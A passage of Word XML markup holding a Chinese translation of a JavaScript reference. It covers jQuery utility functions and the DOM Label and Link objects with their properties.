      </w:r>
      <w:r>
        <w:t>不包含可枚举属性时返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.isFunction(x):boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>仅当</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数时返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.isPlainObject(x):boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>仅当</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是一个普通</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象时返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，比如一个由对象直接量（</w:t>
      </w:r>
      <w:r>
        <w:t>object literal</w:t>
      </w:r>
      <w:r>
        <w:t>）创</w:t>
      </w:r>
      <w:r>
        <w:t>建的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.isXMLDoc(x):true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>仅当</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档或一个</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档的元素时返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.makeArray(a):array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组，其中包含和类数组对象</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>相同的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.map(a,f(elt,idx)):array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个新的数组，值为对于数组（或类数组对象）</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>的每一个元素依次调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值。值为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值将忽略，返回的数组是平整的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jQuery.merge(a,b):array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将数组</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>中的元素追加到</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>中，并返回</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>。参数可以是类数组对象或真正的数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.noConflict([radical=false])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将符号</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>重置为</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>库加载前的值并返回</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>radical</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，则也还原符号</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.proxy(f,o):function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.proxy(o,name):function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个函数，该函数将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的一个方法调用，或者将</w:t>
      </w:r>
      <w:r>
        <w:t>o[name]</w:t>
      </w:r>
      <w:r>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的一个方法调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.queue(elt,[qnam</w:t>
      </w:r>
      <w:r>
        <w:t>e="fx"],[f])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>查询或设置</w:t>
      </w:r>
      <w:r>
        <w:t>elt</w:t>
      </w:r>
      <w:r>
        <w:t>的指定名字的队列，或添加一个新的函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>到这个队列中。和</w:t>
      </w:r>
      <w:r>
        <w:t>$(elt).queue(qname,f)</w:t>
      </w:r>
      <w:r>
        <w:t>等同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.removeData(elt,[name]):void</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>elt</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>对象中移除指定名字的属性，或移除对应的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>对象本身。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jQuery.support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个对象，包含若干描述当前浏览器的特性与</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>的属性。大多属性只有插件开发者感兴趣。在怪异模式（</w:t>
      </w:r>
      <w:r>
        <w:t>quirks mode</w:t>
      </w:r>
      <w:r>
        <w:t>）的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器下</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.support.boxModel</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>fals</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.trim(s):string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回字符串</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>的一个副本，其中去掉了头部和尾部的空白字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="845" w:name="KeyEvent"/>
      <w:r>
        <w:t>KeyEvent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="845"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参见</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="846" w:name="Label"/>
      <w:r>
        <w:t>Label</w:t>
      </w:r>
      <w:bookmarkEnd w:id="846"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于表单控件的＜</w:t>
      </w:r>
      <w:r>
        <w:t>label</w:t>
      </w:r>
      <w:r>
        <w:t>＞</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Label</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>label</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Element control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当前标签关联的</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>。如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>htmlFor</w:t>
      </w:r>
      <w:r>
        <w:t>，这个属性为该属性指定的控件。否则，这个属性为该＜</w:t>
      </w:r>
      <w:r>
        <w:t>label</w:t>
      </w:r>
      <w:r>
        <w:t>＞的第一个</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>子元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Form</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> form</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性指代包含当前标签的</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>元素。或者，如果设置</w:t>
      </w:r>
      <w:r>
        <w:t>HTML form</w:t>
      </w:r>
      <w:r>
        <w:t>属性，则指代那个</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>标识的</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string htmlFor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML for</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。由于</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的保留词，因此为了创建一个合法的标识符，这个属性名以</w:t>
      </w:r>
      <w:r>
        <w:t>"html"</w:t>
      </w:r>
      <w:r>
        <w:t>为前缀。如果设置这个值，这个属性应该指定与本标签关联的</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>。（不过，通常有更简单的方法，只需要简单地将该</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>作为本</w:t>
      </w:r>
      <w:r>
        <w:t>Label</w:t>
      </w:r>
      <w:r>
        <w:t>的一个子孙元素即可。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="847" w:name="Link"/>
      <w:r>
        <w:t>Link</w:t>
      </w:r>
      <w:bookmarkEnd w:id="847"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>超链接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>No</w:t>
      </w:r>
      <w:r>
        <w:t>de</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>链接由＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>area</w:t>
      </w:r>
      <w:r>
        <w:t>＞以及＜</w:t>
      </w:r>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素创建。＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签用于在文档正文中创建超链接。＜</w:t>
      </w:r>
      <w:r>
        <w:t>area</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签是一个较少用到的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>特性，用于创建</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>图片热区</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。＜</w:t>
      </w:r>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签用于在文档的＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞中引用外部资源，如样式表、图标等。＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>area</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的表示方式相同。＜</w:t>
      </w:r>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的表示方式有些不同，为了方便，这两类链接的文档在这儿编写在了一起。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当一个代表＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>Link</w:t>
      </w:r>
      <w:r>
        <w:t>对象用做字符串时，它将返回它的</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。</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除了这儿列出的属性，链接对象也有反映基本的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>特性的属性：</w:t>
      </w:r>
      <w:r>
        <w:t>hreflang</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>media</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>rel</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>sizes</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，返回链接的</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>分解（</w:t>
      </w:r>
      <w:r>
        <w:t>decomposition</w:t>
      </w:r>
      <w:r>
        <w:t>）属性（如</w:t>
      </w:r>
      <w:r>
        <w:t>host</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>pathname</w:t>
      </w:r>
      <w:r>
        <w:t>）只适用于＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞以及＜</w:t>
      </w:r>
      <w:r>
        <w:t>area</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，不适用于＜</w:t>
      </w:r>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，同时，</w:t>
      </w:r>
      <w:r>
        <w:t>sheet</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>disabled</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>relList</w:t>
      </w:r>
      <w:r>
        <w:t>元素只适用于引用样式表的＜</w:t>
      </w:r>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean disabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于指代样式表的＜</w:t>
      </w:r>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，这个属性控制该样式表是否应用到当前</w:t>
      </w:r>
      <w:r>
        <w:t>文档中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>的片断标识符，包含开头的哈希（</w:t>
      </w:r>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t>）标记，例如</w:t>
      </w:r>
      <w:r>
        <w:t>"#results"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>的主机名和端口部分，例如</w:t>
      </w:r>
      <w:r>
        <w:t>"http://ww.oreilly.com:1234"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string hostname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>的主机名部分，例如</w:t>
      </w:r>
      <w:r>
        <w:t>"http://www.oreilly.com"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string href</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>链接的</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>属性。当一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>area</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素用做字符串时，它将是这个属性返回的值。</w:t>
      </w:r>
    </w:p>
